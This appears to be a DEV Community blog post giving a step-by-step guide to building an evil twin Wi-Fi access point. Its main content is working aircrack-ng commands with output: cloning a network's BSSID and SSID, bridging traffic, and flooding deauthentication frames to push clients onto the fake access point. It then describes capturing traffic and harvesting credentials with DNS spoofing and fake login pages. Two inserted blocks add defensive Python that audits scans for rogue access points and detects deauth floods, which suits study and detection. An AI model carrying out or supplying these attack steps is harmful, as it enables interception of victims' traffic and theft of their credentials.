DEV Community

TheScott12

How to Create an Evil Twin Access Point: Step-by-Step Guide

Step-by-Step Guide: Creating an Evil Twin

An Evil Twin Access Point is a malicious wireless access point that is set up to mimic a legitimate one. It can be used to intercept sensitive information such as login credentials, credit card information, and other private data.

In this post, I will provide a step-by-step guide on how to create an Evil Twin Access Point. You will learn how to set up a fake access point that looks like the real one, and how to intercept data from unsuspecting victims.

Follow this guide and learn how to create an Evil Twin Access Point in just a few easy steps.

What is an Evil Twin Access Point?

An evil twin is a fake wireless access point that appears as a genuine hotspot offered by a legitimate provider. The idea is to set up a malicious wireless network with the same SSID name as the original one.

Devices connecting to a Wi-Fi network like laptops, tablets, and smartphones have no way to distinguish between two Wi-Fi networks with the same SSID name. This enables hackers to set up malicious wireless networks that can capture traffic and extract sensitive information from victims.

Enable Monitor Mode

To start with this tutorial, ensure that your wireless card is compatible with the aircrack-ng suite and has monitor mode enabled.

Aircrack-ng is a popular suite of tools for auditing and cracking wireless networks. It includes aircrack-ng (for cracking WEP and WPA-PSK keys), airmon-ng (for putting wireless cards into monitor mode), and airodump-ng (for capturing wireless traffic).

Aircrack-ng is an open-source project and is available for Windows, Linux, and macOS. You can verify if it's functioning correctly by entering the following command:

airmon-ng check kill

This command will check if the wireless card is supported by the aircrack-ng suite and also disable any processes that may interfere with it.

The next step is to enable monitor mode on your wireless interface. This can be accomplished by executing the airmon-ng start wlan0 command.

airmon-ng start wlan0

This will change wlan0 to wlan0mon, which indicates that your wireless interface is now in monitor mode.

Locate the Target Wireless Network

The next step is to scan for nearby wireless routers and locate the Wi-Fi network you want to clone. Execute the following command:

airodump-ng wlan0mon
 CH  6 ][ BAT: 3 hours 9 mins ][ Elapsed: 8 s ][ 2014-05-20 11:10

 BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 28:EF:01:34:64:92  -29       19      1    0   6  54e  WPA2 CCMP   PSK  Linksys
 28:EF:01:35:34:85  -42       17      0    0   6  54e  WPA2 CCMP   PSK  SkyNet
 28:EF:01:34:64:91  -29       19      1    0   1  54e  WPA2 CCMP   PSK  TP-LINK
 28:EF:02:33:38:86  -42       17      0    0  11  54e  WPA2 CCMP   PSK  CISCO-Net

 BSSID              STATION            PWR  Rate   Lost  Packets  Probes

 28:EF:01:35:34:85  28:EF:01:23:46:68  -57  0 - 1     0        1

The wireless network I will be cloning in this tutorial is the SkyNet network with BSSID 28:EF:01:35:34:85 and channel 6.
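A scan like this is also what a defender uses to spot a twin. As an added example (not part of the original post), the Python below parses airodump-ng AP rows like those above and checks them against an assumed inventory of authorized BSSIDs; a twin that clones both BSSID and channel, as this post goes on to do, passes this check and has to be caught from its deauthentication traffic instead.

```python
# Added example (not from the original post): audit airodump-ng AP rows like the scan above.
import re
from collections import defaultdict

# Constructed sample inventory, BSSID -> (ESSID, channel); not real infrastructure.
AUTHORIZED = {"28:EF:01:35:34:85": ("SkyNet", 6), "28:EF:01:34:64:91": ("TP-LINK", 1)}
OUR_ESSIDS = {essid for essid, _ in AUTHORIZED.values()}
MAC_RE = re.compile(r"^([0-9A-F]{2}:){5}[0-9A-F]{2}$", re.I)

def parse_ap_rows(scan_text):
    """AP rows (BSSID PWR Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID); assumes the
    eleven-column WPA/WPA2 layout of the scan above, skipping headers and station rows."""
    aps = []
    for line in scan_text.splitlines():
        parts = line.split()
        if len(parts) < 11 or not MAC_RE.match(parts[0]):
            continue
        aps.append({"bssid": parts[0].upper(), "power": int(parts[1]),
                    "channel": int(parts[5]), "enc": parts[7],
                    "essid": " ".join(parts[10:])})  # ESSIDs may contain spaces
    return aps

def audit(aps):
    """Return (severity, message) findings for one scan."""
    findings, by_essid = [], defaultdict(set)
    for ap in aps:
        by_essid[ap["essid"]].add(ap["bssid"])
        if ap["bssid"] not in AUTHORIZED:
            if ap["essid"] in OUR_ESSIDS:  # our name from a BSSID we do not own
                findings.append(("high", f"{ap['bssid']} advertises our ESSID "
                                         f"{ap['essid']!r} but is not authorized"))
            continue  # a neighbour's network, not ours
        essid, chan = AUTHORIZED[ap["bssid"]]
        if ap["essid"] != essid:  # our BSSID with a name we did not configure
            findings.append(("high", f"{ap['bssid']} advertises {ap['essid']!r}, expected {essid!r}"))
        if ap["channel"] != chan:  # our BSSID moved to another channel
            findings.append(("medium", f"{ap['bssid']} on channel {ap['channel']}, expected {chan}"))
    for essid, bssids in by_essid.items():
        if essid in OUR_ESSIDS and len(bssids) > 1:  # one name, several radios
            findings.append(("medium", f"ESSID {essid!r} seen from {sorted(bssids)}"))
    return findings

# Rows from the scan above plus one constructed rogue row (AA:BB:...) and the station row.
SAMPLE_SCAN = """\
28:EF:01:34:64:92 -29 19 1 0 6 54e WPA2 CCMP PSK Linksys
28:EF:01:35:34:85 -42 17 0 0 6 54e WPA2 CCMP PSK SkyNet
28:EF:01:34:64:91 -29 19 1 0 1 54e WPA2 CCMP PSK TP-LINK
AA:BB:CC:DD:EE:FF -35 22 0 0 11 54e WPA2 CCMP PSK SkyNet
28:EF:01:35:34:85 28:EF:01:23:46:68 -57 0 - 1 0 1
"""
```

Running `audit(parse_ap_rows(SAMPLE_SCAN))` reports the rogue BSSID advertising SkyNet and the resulting ESSID collision, while the neighbours' networks are ignored.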

Create the Evil Twin

Once you’ve found the network which you wish to clone, run the following command in another terminal:

airbase-ng -a 28:EF:01:35:34:85 -e SkyNet -c 6 wlan0mon
$ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon
21:39:29  Created tap interface at0
21:39:29  Trying to set MTU on at0 to 1500
21:39:29  Trying to set MTU on wlan0mon to 1800
21:39:29  Access Point with BSSID 28:EF:01:35:34:85 started.

This command creates an Evil Twin network with the SSID SkyNet; however, it cannot provide internet access yet.

Provide Internet Access to the Evil Twin

I will add a bridge interface called fake; you can name it anything you like.

brctl addbr fake

Now add the two interfaces you’re bridging, eth0 and at0 (make sure eth0 has internet access).

brctl addif fake eth0
brctl addif fake at0

Bring the interfaces up with ifconfig; at0 gets no address of its own (0.0.0.0), since it is now a member of the bridge:

ifconfig at0 0.0.0.0 up
ifconfig fake up

You can take a look at the bridge network interface with ifconfig:

ifconfig
at0       Link encap:Ethernet  HWaddr 74:85:2a
          inet6 addr: fe80::7685:2aff:5b08/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:4 errors:0 dropped:0 overruns:0 frame:0
          TX packets:349 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:500
          RX bytes:540 (540.0 B)  TX bytes:54845 (53.3 KiB)

eth0      Link encap:Ethernet  HWaddr c8:bc:c8
          inet addr:10.0.0.19  Bcast:10.0.0.255  Mask:255.255.255.0
          inet6 addr: fe80::cabc:a6c1/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:640 errors:0 dropped:0 overruns:0 frame:0
          TX packets:529 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:457344 (446.6 KiB)  TX bytes:94347 (92.2 KiB)
          Interrupt:17

fake      Link encap:Ethernet  HWaddr 74:85:2a
          inet addr:10.0.0.194  Bcast:10.0.0.255  Mask:255.255.255.0
          inet6 addr: fe80:::fe97:5b08/64 Scope:Link
          inet6 addr: 2601:d335:7685:2aff:fe97:5b08/64 Scope:Global
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:859 errors:0 dropped:0 overruns:0 frame:0
          TX packets:684 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:492405 (480.8 KiB)  TX bytes:130130 (127.0 KiB)

Kick Wireless Clients from the Legitimate AP

The next step is to kick wireless clients off the legitimate AP, which in my case is the SkyNet network. You can do this with aireplay-ng.

aireplay-ng --deauth 1000 -a 28:EF:01:35:34:85 wlan0mon

This command kicks wireless clients from the real access point network, forcing them to connect to the malicious access point.
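The burst of deauthentication frames this command sends is also the most visible signature of the attack on the air. As an added example (not from the original post), here is a small Python parser for 802.11 deauthentication frames with a sliding-window detector of the kind a wireless IDS runs; the frames it feeds itself are constructed sample input, and the threshold values are assumptions.

```python
# Added example (not from the original post): parse 802.11 deauthentication frames
# and flag a burst from one BSSID, the signature a wireless IDS looks for.
import struct
from collections import deque

DEAUTH_FC = 0xC0  # frame control byte 0: type 0 (management), subtype 12 (deauth)

def mac_str(raw):
    return ":".join(f"{b:02X}" for b in raw)

def parse_deauth(frame):
    """Return (receiver, transmitter, bssid, reason) for a deauth frame, else None."""
    if len(frame) < 26 or frame[0] != DEAUTH_FC:
        return None  # not a deauthentication frame, or truncated
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    reason = struct.unpack("<H", frame[24:26])[0]  # little-endian reason code
    return mac_str(addr1), mac_str(addr2), mac_str(addr3), reason

class DeauthDetector:
    """Sliding window per BSSID: alert once more than `threshold` deauths arrive
    within `window_s` seconds. The defaults are assumptions; tune them per site."""
    def __init__(self, threshold=10, window_s=1.0):
        self.threshold, self.window_s = threshold, window_s
        self.seen = {}  # bssid -> deque of timestamps

    def observe(self, frame, ts):
        parsed = parse_deauth(frame)
        if parsed is None:
            return None
        receiver, transmitter, bssid, reason = parsed
        q = self.seen.setdefault(bssid, deque())
        q.append(ts)
        while q and ts - q[0] > self.window_s:
            q.popleft()  # drop frames that fell out of the window
        if len(q) > self.threshold:
            return (f"deauth flood: {len(q)} frames in {self.window_s}s from "
                    f"{transmitter} (BSSID {bssid}, to {receiver}, reason {reason})")
        return None

# Constructed sample: broadcast deauths (reason 7) apparently from the SkyNet AP above, 50 ms apart.
BSSID, BCAST = bytes.fromhex("28EF01353485"), b"\xff" * 6

def sample_deauth(seq):
    header = bytes([DEAUTH_FC, 0]) + b"\x00\x00" + BCAST + BSSID + BSSID
    return header + struct.pack("<H", seq << 4) + struct.pack("<H", 7)

def run_sample(count=20):
    # Feed `count` constructed deauths through the detector; return the alerts raised.
    det = DeauthDetector()
    alerts = [det.observe(sample_deauth(i), i * 0.05) for i in range(count)]
    return [a for a in alerts if a]
```

With the default threshold, `run_sample()` starts alerting on the eleventh frame inside the one-second window, while a handful of legitimate deauths raise nothing.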

As you can see in the output below, a client has associated with my evil twin. This information is found in the airbase-ng terminal (client 28:EF:01:23:46:68 associated).

$ airbase-ng -a 28:EF:01:35:34:85 --essid SkyNet -c 6 wlan0mon
14:50:56  Created tap interface at0
14:50:56  Trying to set MTU on at0 to 1500
14:50:56  Trying to set MTU on wlan5 to 1800
14:50:56  Access Point with BSSID 28:EF:01:35:34:85 started.
14:58:55  Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"
15:03:24  Client 28:EF:01:23:46:68 associated (WPA2;CCMP) to ESSID: "SkyNet"

At this point all of the victim's traffic passes through the attacker's machine, so the attacker can capture sensitive information; this is, in effect, a man-in-the-middle attack.

The attacker can then perform further attacks such as DNS spoofing, which redirects the victim to a cloned or fake login page. Once the victim tries to log in, the attacker harvests the credentials.

Conclusion

In today's digital age, using public Wi-Fi networks has become a common practice for many people. However, it's important to be aware of the risks associated with connecting to these networks, as they can be vulnerable to cyber-attacks and hacking attempts.